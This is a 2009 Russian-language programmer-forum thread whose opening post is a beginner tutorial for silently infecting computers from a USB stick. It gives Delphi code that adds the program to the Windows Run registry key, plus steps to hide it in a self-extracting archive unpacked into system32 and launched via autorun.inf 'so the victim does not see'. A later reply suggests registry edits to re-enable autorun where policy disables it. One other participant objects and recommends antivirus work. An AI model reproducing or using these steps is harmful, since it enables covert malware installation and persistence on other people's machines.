Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Программная инженерия > Безопасность, Шифрование
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 09.11.2009, 21:36   #1
OPF_Nik
Пользователь
 
Регистрация: 09.11.2009
Сообщений: 33
По умолчанию Запуск файла с USB носителя)

Введени: статья расчитано только на новичков, т.к опытные пользователи и так это знаю)

1. Сначало надо подготовить прогу(в данном случае Delphi)

Для этого в ее коде для начало в разделе Uses добовляем модуль "registry"
Затем в OnCreate формы пишем вот этот код:


var
reg: Tregistry;

begin
reg:= Tregistry.Create;
reg.RootKey:= HKEY_LOCAL_MACHINE;
reg.OpenKey('Software', true);
reg.OpenKey('Microsoft', true);
reg.OpenKey('Windows', true);
reg.OpenKey('CurrentVersion', true);
reg.OpenKey('Run', true);
reg.WriteString('sstt', Application.ExeName);
reg.CloseKey;
end:

Обьясню для новичков)) Данный код прописывает себя в реестре автозагрузке)) тоесть куда бы вы не поместитили прогу она сама себя запишет в авторан))

2.Теперь перейдем не посредсвенно к запуску с флешки)) Наш цель состоит в том что бы когда флешка была подключина к порту USB она автоматически копировалась на жесткий диск) причем так что бы этого не видела жертва))

Дальше делаем следующию операцию:
Нажимай правую кнопку на нашей проге, затем "добавить в архив..." Теперь надо поменять пару настроек:

1. ставим галочку напротив пункта:"Создать SFX арив
2. Потом выбираем вкладку дополнительно и нажимаем на : "Параметры SFX"
3. В "Путь для распоковки" указывем путь где вы хотите что бы располагалась ваша прога)) я указал:
C:\WINDOWS\system32
4. В "Выполнить после распоковки" пишем опять же:
C:\WINDOWS\system32 ,но только теперь дабовляем нашу прогу)) допустим что она называеться:
"proga.exe", тогда в итоге получиться:
C:\WINDOWS\system32\proga.exe
5. Далее переходим на на закладку"Режимы"
и ставим галочку рядом с "Скрыть все"
6. Далее нажимаем "ок"))

Осталось только сделать что бы наш архив запустилься)) для этого в корне с флешкой создаем файл "autorun.inf" это можно сделать при помощи блокнота))
Далее открываем все с помощью того же блокнота это файл и встовляем туда это:

[autorun]
icon=icons\drive.ico
shellexecute=proga.exe
Сохраняем и закрываем блокнот!)

Все, подведем итог:

Когда наша флешка подключаеться с USB, то запускаеться наш архив "proga.sfx.exe" благодоря:
"autorun.inf" После чего наш архив распоковывает и запускает нашу прогу(причем на экране не чего не происходит) Так же при этом запуске программа прописывает себе а автозагрузке)) Все вирус на компьютере и запускаеться вместе с системой))
OPF_Nik вне форума Ответить с цитированием
Старый 09.11.2009, 21:40   #2
raxp
Старожил
 
Регистрация: 29.09.2009
Сообщений: 9,713
По умолчанию

а если у меня в политиках стоит запрет на автозапуск с флешек?
Разработки и научно-технические публикации :: Видеоблог :: Твиттер
Radar systems engineer & Software developer of industrial automation
raxp вне форума Ответить с цитированием
Старый 09.11.2009, 21:53   #3
OPF_Nik
Пользователь
 
Регистрация: 09.11.2009
Сообщений: 33
По умолчанию

Точно не знаю..
Попробуй в реестре это прописать:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microso ft\Windows\CurrentVersion\policies\ Explorer]
"NoDriveTypeAutoRun"= -

или
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentCo ntrolSet\Services\Cdrom]
"AutoRun"=dword:00000001


Ну это уже не мое, это я на какомсто сайте видел
OPF_Nik вне форума Ответить с цитированием
Старый 09.11.2009, 22:00   #4
raxp
Старожил
 
Регистрация: 29.09.2009
Сообщений: 9,713
По умолчанию

доступ на реестр тоже закрыт
Разработки и научно-технические публикации :: Видеоблог :: Твиттер
Radar systems engineer & Software developer of industrial automation
raxp вне форума Ответить с цитированием
Старый 09.11.2009, 22:05   #5
OPF_Nik
Пользователь
 
Регистрация: 09.11.2009
Сообщений: 33
По умолчанию !

Незнаю)) единсвтенное что в голову лезить так это на другом компе это сделать, сохранить файл это файл в .reg, скинуть на комп и там запустить)))

Может у вас есть предложения?)
OPF_Nik вне форума Ответить с цитированием
Старый 09.11.2009, 22:20   #6
raxp
Старожил
 
Регистрация: 29.09.2009
Сообщений: 9,713
Смех

не пойдет, доступ к реестру закрыт, это значит запрещено его изменение

...у меня есть вопрос: зачем это нужно?
Разработки и научно-технические публикации :: Видеоблог :: Твиттер
Radar systems engineer & Software developer of industrial automation
raxp вне форума Ответить с цитированием
Старый 09.11.2009, 22:23   #7
OPF_Nik
Пользователь
 
Регистрация: 09.11.2009
Сообщений: 33
По умолчанию

Просто решил выложит)) надеюсь что хоть кому то будет интереснно)) я кстати таким способом друзей прикалывал, когда какую нибудь веселую программку скину!))
OPF_Nik вне форума Ответить с цитированием
Старый 09.11.2009, 22:28   #8
raxp
Старожил
 
Регистрация: 29.09.2009
Сообщений: 9,713
По умолчанию

спасибо конечно но ваш способ уже давно известен и... прикрыт.

совет: займитесь чем-нибудь полезным, например антивирусной защитой
Разработки и научно-технические публикации :: Видеоблог :: Твиттер
Radar systems engineer & Software developer of industrial automation
raxp вне форума Ответить с цитированием
Старый 09.11.2009, 22:31   #9
OPF_Nik
Пользователь
 
Регистрация: 09.11.2009
Сообщений: 33
По умолчанию

Ну во первых, что способ известен я знаю)) для новичков выложил, мне кажеться им интересно будет!))) Ну а во вторых мне знаний на Антивирусную защиту не хватет, причем много)))
OPF_Nik вне форума Ответить с цитированием
Старый 09.11.2009, 22:34   #10
raxp
Старожил
 
Регистрация: 29.09.2009
Сообщений: 9,713
По умолчанию

ну вот вам для начала: придумайте защиту от скриншота...
Разработки и научно-технические публикации :: Видеоблог :: Твиттер
Radar systems engineer & Software developer of industrial automation
raxp вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Запуск функции из файла Nemez JavaScript, Ajax 14 05.02.2009 02:35
Запуск файла из Excel Фернан Microsoft Office Excel 6 29.01.2009 22:51
запуск файла С# TaTT DoGG Общие вопросы .NET 10 24.11.2008 23:05
Запуск файла по пути John_chek Общие вопросы Delphi 3 29.05.2007 12:38
запуск некоего файла Viten2 Общие вопросы Delphi 4 29.01.2007 20:04